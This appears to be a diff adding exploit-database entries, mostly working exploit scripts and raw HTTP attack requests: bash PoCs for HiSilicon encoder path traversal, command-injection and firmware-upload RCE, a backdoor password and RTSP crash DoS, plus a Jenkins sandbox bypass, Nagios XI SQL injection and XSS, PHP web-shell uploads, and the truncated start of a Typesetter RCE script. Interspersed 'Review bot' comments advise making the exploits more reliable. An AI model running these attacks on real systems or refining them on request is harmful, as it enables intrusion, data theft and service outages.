diff --git a/exploits/hardware/webapps/48899.sh b/exploits/hardware/webapps/48899.sh
new file mode 100755
index 000000000..5ebddfacb
--- /dev/null
+++ b/exploits/hardware/webapps/48899.sh
@@ -0,0 +1,24 @@
+#!/usr/bin/env bash
+
+# Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal
+# Date: 2020-09-20
+# Exploit Author: Alexei Kojenov
+# Vendor Homepage: https://www.szuray.com/
+# Software Link: N/A
+# Version: up to 1.97
+# Tested on: Linux
+# CVE: CVE-2020-24219
+# Vendors: URayTech
+# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
+# Reference: https://www.kb.cert.org/vuls/id/896979
+
+
+if [ "$#" -ne 2 ]
+then
+ echo "Usage: $0 [:] "
+ echo "Example: $0 1.2.3.4:8086 /box/box.ini"
+ exit 1
+fi
+
+curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \
+ || echo "ERROR: curl returned $?"
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48900.sh b/exploits/hardware/webapps/48900.sh
new file mode 100755
index 000000000..53b70d38c
--- /dev/null
+++ b/exploits/hardware/webapps/48900.sh
@@ -0,0 +1,28 @@
+#!/usr/bin/env bash
+
+# Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection
+# Date: 2020-09-20
+# Exploit Author: Alexei Kojenov
+# Vendor Homepage: multiple vendors
+# Software Link: N/A
+# Version: vendor-specific
+# Tested on: Linux
+# CVE: CVE-2020-24217
+# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
+# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
+# Reference: https://www.kb.cert.org/vuls/id/896979
+
+
+if [ "$#" -ne 2 ]
+then
+ echo "Usage: $0 [:] "
+ exit 1
+fi
+
+printf "executing the command... "
+if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null
+then
+ echo "SUCCESS: remote command executed"
+else
+ echo "ERROR: $?"
+fi
\ No newline at end of file
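Review bot: `curl -s` without `--fail` exits 0 for any HTTP response, so a 404 or a login page from a patched encoder is printed as if it were the requested file, and the error message goes to stdout where it mixes with disclosed content when the output is redirected. Use `curl -sf --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" || echo "ERROR: curl returned $?" >&2` so a non-2xx status is a visible failure and diagnostics stay on stderr. The usage text's placeholders appear to have been lost in this listing (`Usage: $0 [:] `); confirm the shipped file still reads host[:port] and an absolute path, since `$2` is appended directly after the traversal prefix. The traversal depth is tied to the `13070000.jpgd` sysfs path, so it is presumably specific to this SoC's device tree — a one-line comment above the curl call would save the next reader from treating it as a generic encoder path.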
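Review bot: The `SUCCESS: remote command executed` branch fires on any exchange curl completes, because `curl -sF ... >/dev/null` exits 0 for a 4xx/5xx reply too; without `-f`, and ideally an out-of-band signal such as a ping or callback in the injected command, the script cannot distinguish a patched device from a vulnerable one. Change the condition to `if curl -sf -F "upgrade=;filename=\"logo;$2;.png\"" "http://$1" >/dev/null` and word the message as "request accepted (HTTP 2xx) — verify execution out of band". Also note in the usage text that `$2` is spliced raw into a double-quoted multipart `filename=` value, so a command containing `"` or `;` breaks the part header before it reaches the injection point.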
diff --git a/exploits/hardware/webapps/48901.sh b/exploits/hardware/webapps/48901.sh
new file mode 100755
index 000000000..f351b131d
--- /dev/null
+++ b/exploits/hardware/webapps/48901.sh
@@ -0,0 +1,35 @@
+#!/usr/bin/env bash
+
+# Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
+# Date: 2020-09-20
+# Exploit Author: Alexei Kojenov
+# Vendor Homepage: multiple vendors
+# Software Link: N/A
+# Version: vendor-specific
+# Tested on: Linux
+# CVE: CVE-2020-24217
+# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
+# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
+# Reference: https://www.kb.cert.org/vuls/id/896979
+
+
+if [ "$#" -ne 2 ]
+then
+ echo "Usage: $0 [:] "
+ exit 1
+fi
+
+printf "creating uk.rar... "
+echo "$2" > uk.txt
+rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; }
+echo "done"
+rm uk.txt
+
+printf "uploading the RAR file... "
+if curl -s -F 'upgrade=@uk.rar' http://$1 >/dev/null
+then
+ echo "SUCCESS: remote command executed"
+ rm uk.rar
+else
+ echo "ERROR: $?"
+fi
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48902.sh b/exploits/hardware/webapps/48902.sh
new file mode 100755
index 000000000..7e018886f
--- /dev/null
+++ b/exploits/hardware/webapps/48902.sh
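Review bot: The script writes `uk.txt` and `uk.rar` with fixed names into the caller's current directory, and `rm uk.rar` runs only on the success path, so a failed upload leaves the crafted archive behind and a later run silently clobbers whatever `uk.txt` is already there. Stage the files under `mktemp -d` with an EXIT trap, and write the payload with `printf '%s\n' "$2"` instead of `echo "$2"`, which mangles a command that starts with `-n`/`-e` or contains backslashes. The `uk.rar`/`uk.txt` names look significant to the target's upgrade handler, so keep them as the in-archive names and only relocate the directory. As in the sibling scripts, `SUCCESS` here only means curl got some response; add `-f` and say so in the message.
```shell
tmpdir=$(mktemp -d) || { echo "ERROR: mktemp failed" >&2; exit 2; }
trap 'rm -rf -- "$tmpdir"' EXIT
printf '%s\n' "$2" > "$tmpdir/uk.txt"
( cd "$tmpdir" && rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 ) \
  || { echo "ERROR: rar failed. Is it installed?" >&2; exit 2; }
# … unchanged: progress messages …
if curl -sf -F "upgrade=@$tmpdir/uk.rar" "http://$1" >/dev/null
```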
@@ -0,0 +1,33 @@
+#!/usr/bin/env bash
+
+# Exploit Title: HiSilicon video encoders - full admin access via backdoor password
+# Date: 2020-09-20
+# Exploit Author: Alexei Kojenov
+# Vendor Homepage: multiple vendors
+# Software Link: N/A
+# Version: vendor-specific
+# Tested on: Linux
+# CVE: CVE-2020-24215
+# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
+# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
+# Reference: https://www.kb.cert.org/vuls/id/896979
+
+
+if [ "$#" -ne 1 ]
+then
+ echo "Usage: $0 [:]"
+ exit 1
+fi
+
+printf "retrieving the password... "
+password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \
+ grep -oP '(?<=).*?(?=)')
+ret=$?
+
+if [ "$ret" -eq 0 ]
+then
+ echo "the password is '$password'"
+ echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'"
+else
+ echo "ERROR: curl returned $ret"
+fi
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48903.sh b/exploits/hardware/webapps/48903.sh
new file mode 100755
index 000000000..d62128605
--- /dev/null
+++ b/exploits/hardware/webapps/48903.sh
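Review bot: `ret=$?` after the `curl ... | grep` pipeline holds grep's exit status, not curl's, so a refused connection or a 401 from a patched device and a successful fetch whose body simply does not match both print `ERROR: curl returned 1`, and a silent curl failure is never surfaced on its own. Adding `set -o pipefail` near the top and `-f` to curl (`curl -sf --user admin:neworange88888888 "http://$1/get_sys"`) makes a failed or non-2xx fetch produce a non-zero `$ret` instead of being masked by the grep result. The `grep -oP '(?<=).*?(?=)'` pattern as listed has empty look-around assertions and would match the empty string, yielding `the password is ''`; the element names were presumably stripped from this listing, so confirm the shipped file still carries them. The hard-coded `admin:neworange88888888` on the curl command line is visible to other local users via `ps` while it runs — acceptable for a PoC, but worth a comment.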
@@ -0,0 +1,43 @@
+#!/usr/bin/env bash
+
+# Exploit Title: HiSilicon video encoders - unauthenticated RTSP buffer overflow (DoS)
+# Date: 2020-09-20
+# Exploit Author: Alexei Kojenov
+# Vendor Homepage: multiple vendors
+# Software Link: N/A
+# Version: vendor-specific
+# Tested on: Linux
+# CVE: CVE-2020-24214
+# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
+# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
+# Reference: https://www.kb.cert.org/vuls/id/896979
+
+
+if [ "$#" -ne 2 ]
+then
+ echo "usage: $0 "
+ exit 1
+fi
+
+server=$1
+port=$2
+
+printf "checking the target... "
+timeout 2 curl -s rtsp://$server:$port \
+ || { echo "ERROR: no RTSP server found at $server:$port"; exit 2; }
+printf "RTSP server detected\n"
+
+cseq=$(printf "0%0.s" {1..3000})
+
+printf "sending the payload... "
+printf "OPTIONS /0 RTSP/1.0\nCSeq: %s\n\n" $cseq | telnet $server $port >/dev/null 2>&1
+printf "done\n"
+
+sleep 1
+printf "checking the target again... "
+if timeout 2 curl -s rtsp://$server:$port
+then
+ echo "ERROR: the RTSP server still seems to be running :("
+else
+ echo "SUCCESS: the server is down"
+fi
\ No newline at end of file
diff --git a/exploits/java/webapps/48904.txt b/exploits/java/webapps/48904.txt
new file mode 100644
index 000000000..ef23e1a40
--- /dev/null
+++ b/exploits/java/webapps/48904.txt
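Review bot: The crafted request goes out with bare `\n` line endings through `telnet`, a tool that is often missing on minimal hosts and may close the connection on stdin EOF before the 3 KB line is flushed; RTSP is CRLF-delimited, and the listing does not say whether the encoder's parser tolerates LF-only input. Bash can send it without telnet and with the proper terminators: `printf 'OPTIONS /0 RTSP/1.0\r\nCSeq: %s\r\n\r\n' "$cseq" > "/dev/tcp/$server/$port"` (which also quotes `$cseq`). The closing check reports `SUCCESS: the server is down` for any non-zero `curl` exit, including the 2-second `timeout` firing on a server that is merely slow to answer after the probe, so print curl's exit status next to the verdict and consider a second probe after a longer wait. Since a hit leaves the RTSP service down, the header should state this is a destructive test to be run only with authorization.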
@@ -0,0 +1,33 @@
+# Exploit Title: Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in
+# Date: 8th October 2020
+# Exploit Author: dmw0ng
+# Vendor Homepage: https://www.jenkins.io
+# Software Link: http://archives.jenkins-ci.org/windows/jenkins-2.63.zip
+# Version: Jenkins 2.63
+# Tested on: Ubuntu 18.04 / 20.04
+# CVE : CVE-2019-1003030
+
+GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
+ public x(){
+"ping -c 1 xx.xx.xx.xx".execute()
+}
+} HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+URL Encoding the following for RCE
+```public class x {
+ public x(){
+"ping -c 1 xx.xx.xx.xx".execute()
+}
+} ```
+
+to
+
+%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
\ No newline at end of file
diff --git a/exploits/php/webapps/48892.txt b/exploits/php/webapps/48892.txt
new file mode 100644
index 000000000..c5ddafb0d
--- /dev/null
+++ b/exploits/php/webapps/48892.txt
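Review bot: The request carries a `JSESSIONID` cookie and reaches the endpoint via `securityRealm/user/admin/descriptorByName/...`, so an authenticated session appears to be required (that path is the usual way to reach descriptor form-validation URLs with only read access), yet the header never says so — add a line stating the required privilege and that `/jenkinselj/` is the tester's context path. CVE-2019-1003030 is tracked against the Pipeline: Groovy plugin, so the `Version:` line should give the affected plugin version rather than only Jenkins core 2.63. The raw `GET` as printed contains literal braces, quotes and newlines in the request line and is not a sendable request; make clear that the percent-encoded `value=` string at the bottom is the one to use, e.g. `curl -b 'JSESSIONID.<id>=<value>' 'http://HOST/<ctx>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=%70%75...'`, with `xx.xx.xx.xx` replaced by a listener the tester controls so execution can actually be confirmed.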
@@ -0,0 +1,67 @@ +#Exploit Title: Tourism Management System 1.0 - Arbitrary File Upload +#Date: 2020-10-19 +#Exploit Author: Ankita Pal & Saurav Shukla +#Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/ +#Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204 +#Version: V1.0 +#Tested on: Windows 10 + xampp v3.2.4 + + +Proof of Concept::: + +Step 1: Open the affected URL http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php + +Step 2: Open Tour Package -> Create + +Malicious Request::: + +POST /Tourism%20Management%20System%20-TMS/tms/admin/create-package.php HTTP/1.1 +Host: localhost:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------63824304340061635682865592713 +Content-Length: 1101 +Origin: http://localhost:8081 +Connection: close +Referer: http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php +Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id +Upgrade-Insecure-Requests: 1 + +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packagename" + +Pack1 +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packagetype" + +Family +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packagelocation" + +Manali +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packageprice" + +21 +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packagefeatures" + +Free +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; 
name="packagedetails" + +Details +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="packageimage"; filename="file1.php" +Content-Type: application/octet-stream + + +-----------------------------63824304340061635682865592713 +Content-Disposition: form-data; name="submit" + + +-----------------------------63824304340061635682865592713-- \ No newline at end of file diff --git a/exploits/php/webapps/48893.txt b/exploits/php/webapps/48893.txt new file mode 100644 index 000000000..0a0af943e --- /dev/null +++ b/exploits/php/webapps/48893.txt 
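Review bot: The PoC stops at the upload request and never shows where `file1.php` is stored or a request that executes it, so "Arbitrary File Upload" is asserted rather than demonstrated; add the resulting path under the application's image directory and a fetch of it, using a harmless marker as the `packageimage` part body (which is empty in this listing). The request goes to `/tms/admin/create-package.php` with a `PHPSESSID`, i.e. an admin session is required — the title and the index entry should carry `(Authenticated)`, and Step 1 should say the browser must already be logged in as admin. Content-Length 1101 will also no longer match once a real body is put in the file part; drop the header or tell readers to recompute it.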
@@ -0,0 +1,34 @@
+# Exploit Title: Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting
+# Date: 10-18-2020
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
+# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
+# Software Link: https://www.nagios.com/downloads/nagios-xi/
+# Version: Nagios XI 5.7.3
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in the "Contact Templates" functionality of the Core Config Manager of Nagios XI.
+# Vulnerable Parameter : tfName
+
+
+# POC
+# Exploit Details : The following request will create a contact template with an XSS payload as the contact template name. Click on "Relationships" for the malicious template to trigger the payload.
+
+
+POST /nagiosxi/includes/components/ccm/index.php?type=contacttemplate&page=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 642
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=contacttemplate&id=7&page=1&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1
+Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
+Upgrade-Insecure-Requests: 1
+
+tfName=&tfFriendly=&tfEmail=&tfPager=&Active=1&tfAddress1=&tfAddress2=&tfAddress3=&tfAddress4=&tfAddress5=&tfAddress6=&radHostNotifEnabled=2&selHostPeriod=0&radStatusInfos=2&radNoStatusInfos=2&radServiceNotifEnabled=2&selServicePeriod=0&radCanSubCmds=2&radContactgroup=2&radServicecommand=2&radHostcommand=2&txtVariablename=&txtVariablevalue=&cmd=submit&mode=modify&hidId=7&hidName=test&hidServiceDescription=&hostAddress=127.0.0.1&exactType=contacttemplate&type=contacttemplate&genericType=contacttemplate&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1&token=3b8273eea1213ac4d2c1f3da1b0c370d
\ No newline at end of file
diff --git a/exploits/php/webapps/48894.txt b/exploits/php/webapps/48894.txt
new file mode 100644
index 000000000..41b55bbf2
--- /dev/null
+++ b/exploits/php/webapps/48894.txt
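Review bot: The body has `tfName=` empty and `mode=modify&hidId=7`, so as listed the request renames existing template 7 to a blank name rather than creating a template with an XSS payload as the description claims; the payload was presumably stripped from this listing, but the text should also say "modify an existing template" or switch to the create form. `token=` and the `nagiosxi` cookie are session-bound values the reader must re-capture, and the Core Config Manager is an administrative feature, so state that an authenticated CCM-capable account is required and that the payload runs in the browser of whichever admin later opens "Relationships" — that is the actual privilege impact.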
@@ -0,0 +1,30 @@
+# Exploit Title: Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection
+# Date: 10-18-2020
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
+# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
+# Software Link: https://www.nagios.com/downloads/nagios-xi/
+# Version: Nagios XI 5.7.3
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A blind SQL injection vulnerability exists in the "Manage Users" functionality of the Core Config Manager of Nagios XI.
+# Vulnerable Parameter : id
+
+
+# POC
+
+POST /nagiosxi/includes/components/ccm/index.php?type=user&page=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=user&id=2&page=1&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1
+Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 338
+
+username=test&alias=test&password=password&confirm=password&active=1&id=2+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))A)&cmd=admin&mode=modify&hidId=2&hidName=&hidServiceDescription=&hostAddress=127.0.0.1&exactType=user&type=user&genericType=user&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1&token=991611d98c6c8ea7d32c54522b346448
\ No newline at end of file
diff --git a/exploits/php/webapps/48895.txt b/exploits/php/webapps/48895.txt
new file mode 100644
index 000000000..6d89637d3
--- /dev/null
+++ b/exploits/php/webapps/48895.txt
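Review bot: The request is not side-effect-free: alongside the timing probe in `id=2+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))A)` it posts `username=test&password=password&confirm=password` with `mode=modify&hidId=2`, so on a vulnerable target it overwrites user id 2's name and password. Say so explicitly and point testers at a throwaway user, or submit that user's existing values for the unrelated fields. A single 5-second delay is weak evidence on a slow instance; suggest comparing against a baseline (`SLEEP(0)`) before concluding. The `token` and `nagiosxi` cookie are per-session and must be re-captured from the CCM page.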
@@ -0,0 +1,27 @@
+# Exploit Title: Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection
+# Date: 10-18-2020
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
+# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
+# Software Link: https://www.nagios.com/downloads/nagios-xi/
+# Version: Nagios XI 5.7.3
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A blind SQL injection vulnerability exists in the "Add a Trap Definition" functionality of the SNMP Trap Interface of Nagios XI.
+# Vulnerable Parameter : id
+
+
+# POC
+
+GET /nagiosxi/includes/components/nxti/index.php?event=test&oid=123&category=test&severity=test&desc=%3C%3E&format=&id=&SNMPTW%5Bhost%5D=&SNMPTW%5Bservice%5D=&SNMPTW%5Bseverity%5D=%24s&SNMPTW%5Boutput%5D=&exec%5B%5D=&raw-data=&mode=save&new=0&tab=3&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a) HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://TARGET/nagiosxi/includes/components/nxti/index.php
+Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
\ No newline at end of file
diff --git a/exploits/php/webapps/48896.txt b/exploits/php/webapps/48896.txt
new file mode 100644
index 000000000..1324771f9
--- /dev/null
+++ b/exploits/php/webapps/48896.txt
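Review bot: The query string carries `id=` twice — an empty one early on and `id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)` at the end — and the injection presumably lands only because the last occurrence wins when PHP builds `$_GET`; state that so re-implementations don't drop the duplicate, or remove the empty one. With `mode=save&new=0`, a request that succeeds also writes a trap definition (`desc=<>`, `severity=$s`) into the SNMP Trap Interface configuration, a persistent change that should be called out. The `nagiosxi` cookie implies an authenticated session with access to the trap interface; note which role that is.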
@@ -0,0 +1,17 @@
+# Exploit Title: Online Student's Management System 1.0 - Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020/10/18
+# Exploit Author: Akıner Kısa
+# Vendor Homepage: https://www.sourcecodester.com/php/14490/online-students-management-system-php-full-source-code-2020.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip
+# Version: 1.0
+# Tested on: XAMPP
+# CVE : N/A
+
+Proof of Concept:
+
+1 - Go to http://localhost/studentrecord/ url, click "click here to sign in" text and login with the 070101:070101 information.
+
+2 - Then go to http: //localhost/studentrecord/my-profile.php and upload your shell file from the upload new photo section and click the update button.
+
+3 - Finally, open your shell in http://localhost/studentrecord/staffphoto/shell.php
\ No newline at end of file
diff --git a/exploits/php/webapps/48897.txt b/exploits/php/webapps/48897.txt
new file mode 100644
index 000000000..f2ff2f4d5
--- /dev/null
+++ b/exploits/php/webapps/48897.txt
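Review bot: Step 1's `070101:070101` credentials are not explained — say whether this is a seeded account shipped in the vendor's SQL dump or one created by self-registration, because "Authenticated RCE" means something quite different in each case. Step 3 assumes the upload keeps its original filename under `staffphoto/`; if that is what was observed, say so (and that no extension or content-type check is applied), otherwise the reader cannot reproduce the path. Step 2's URL has a stray space (`http: //localhost/...`).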
@@ -0,0 +1,17 @@
+# Exploit Title: Online Discussion Forum Site 1.0 - XSS in Messaging System
+# Google Dork: N/A
+# Date: 2020-10-17
+# Exploit Author: j5oh
+# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
+# Version: 1.0 (REQUIRED)
+# Tested on: Windows 10 / Wamp Server
+# CVE : N/A
+
+The messaging subsystem in the Online Discussion Forum is vulnerable to XSS in the message body. This will execute when viewing the messages page: http://localhost/Online%20Discussion%20Forum%20Site/messages.php.
+
+XSS can be done through the messaging interface, go to http://localhos/Online%20Discussion%20Forum%20Site/messages.php, select 'Send New Message', search for the user to send the message to, click the 'Send Message' button next to the user, and add the javascript in the message body. Alternatively, if you know the user id you can just send the message directly thought the tt parameter of http://localhost/Online%20Discussion%20Forum%20Site/messageH.php.
+
+# PoC:
+
+curl -d 'uto=1&tt=' -b "PHPSESSID=798bkt3dkvoczjp7arnco3jf0c" http://localhost/Online%20Discussion%20Forum%20Site/messageH.php
\ No newline at end of file
diff --git a/exploits/php/webapps/48898.txt b/exploits/php/webapps/48898.txt
new file mode 100644
index 000000000..8450bab5a
--- /dev/null
+++ b/exploits/php/webapps/48898.txt
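Review bot: The PoC's `curl -d 'uto=1&tt='` has an empty `tt=` value, so as listed it sends no payload; the script tag was presumably stripped from this listing, but when restored it should be passed as `--data-urlencode 'tt=<payload>'`, because `-d` sends the string verbatim and a payload containing `+`, `&` or `#` is mis-parsed server-side. The request needs a valid `PHPSESSID`, so the title should carry "(Authenticated)" and say which role — apparently any registered user able to send messages — can plant it, and that the script runs for the recipient, which is the stored-XSS impact. Minor: `http://localhos/...` in the second paragraph, "thought the tt parameter", and the template residue `# Version: 1.0 (REQUIRED)` should be fixed.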
@@ -0,0 +1,17 @@
+# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored)
+# Google Dork: N/A
+# Date: 2020/10/17
+# Exploit Author: Akıner Kısa
+# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
+# Version: 1.0
+# Tested on: XAMPP
+# CVE : N/A
+
+Proof of Concept:
+
+1 - Open URL http://localhost/jobportal/Employer/ManageJob.php
+
+2 - Fill in the blanks with this payload: ">
+
+3 - And click submit button.
\ No newline at end of file
diff --git a/exploits/php/webapps/48905.txt b/exploits/php/webapps/48905.txt
new file mode 100644
index 000000000..f4ec47ad7
--- /dev/null
+++ b/exploits/php/webapps/48905.txt
@@ -0,0 +1,39 @@
+# Exploit Title: PHPGurukul hostel-management-system 2.1 allows XSS via
+Guardian Name, Guardian Relation, Guardian Contact no, Address, City
+# Google Dork: N/A
+# Date: 2020-10-08
+# Exploit Author: Kokn3t
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/hostel-management-system
+# Version: V 2.1
+# Tested on: Windows 10, Kali 2020.1
+# CVE : CVE-2020-25270
+
+######## Attack Vector ########
+
+Install Hostel Management System V 2.1
+
+1) User Module
+
+ Login as user and go to "Book Hostel"
+(http:/localhost/hostel/book-hostel.php) and start booking.
+
+ Add malicious script in these fields - ""
+
+ i. Guardian Name
+
+ ii. Guardian Relation
+
+ iii.Guardian Contact no
+
+ iv. Address
+
+ vi. City
+
+ After that will get a prompt "Student Successfully register" and after
+pressing "See All", XSS will be triggered.
+
+2) Admin Module
+
+Login in as Admin and go to "Management Students", and "View Full details"
+of booked student's record, XSS will be triggered also.
\ No newline at end of file
diff --git a/exploits/php/webapps/48906.py b/exploits/php/webapps/48906.py
new file mode 100755
index 000000000..19c5d4b95
--- /dev/null
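Review bot: The payload in Step 2 is shown only as `">` — the script element has evidently been stripped from this listing — and the PoC never names which field(s) of `Employer/ManageJob.php` store the value or on which page it later executes, which is exactly what distinguishes a stored XSS from a reflected one. Add the vulnerable parameter names, the rendering location (job listing, applicant view, admin panel), and a note that an employer account is required to reach the form.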
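Review bot: The payload line `Add malicious script in these fields - ""` is empty as listed, so the PoC is not reproducible from this file; restore it and give the exact POST parameter names behind the five labels. The impact is only implicit: a student's booking-form value executes in the administrator's browser under "Manage Students -> View Full details", i.e. a low-privilege user can run script in an admin session — that deserves a sentence in the header. Also `http:/localhost/hostel/book-hostel.php` is missing a slash and the field list jumps from iv. to vi.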
+++ b/exploits/php/webapps/48906.py 
@@ -0,0 +1,211 @@ +# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution +# Exploit Author: Rodolfo "t0gu" Tavares +# Contact: @t0guu (TW) +# Software Homepage: https://www.typesettercms.com/ +# Version : 5.1 +# Tested on: Linux / Apache +# Category: WebApp +# Google Dork: intext:"Powered by Typesetter" +# Date: 2020-09-29 +# CVE : CVE-2020-25790 + +######## Description ######## +# +# The CMS Typesetter has functionality (web interface) where it is possible +# through an account with privileges to perform uploads. Through this +# functionality, it is possible to upload a .zip file that contains a +# malicious .php file. In the same functionality, there is also the +# possibility to extract the file through the same web interface, the +# attacker only needs to extract the .zip that was previously loaded and +# click on the malicious .php file to execute commands in the operating +# system. +# + +######## Exploit with Poc ######## + + +https://github.com/t0gu/CVE-2020-25790 + +####### Code ####### + + +# see the poc at https://github.com/t0gu/CVE-2020-25790 + +import argparse +from bs4 import BeautifulSoup +import requests +import sys +import re + + +import urllib3 +from urllib3.exceptions import InsecureRequestWarning + +banner = """ + + + ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗███████╗ █████╗ ██████╗ +██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔═████╗ ╚════██╗██╔════╝╚════██║██╔══██╗██╔═████╗ +██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝██║██╔██║█████╗ █████╔╝███████╗ ██╔╝╚██████║██║██╔██║ +██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ████╔╝██║╚════╝██╔═══╝ ╚════██║ ██╔╝ ╚═══██║████╔╝██║ +╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗╚██████╔╝ ███████╗███████║ ██║ 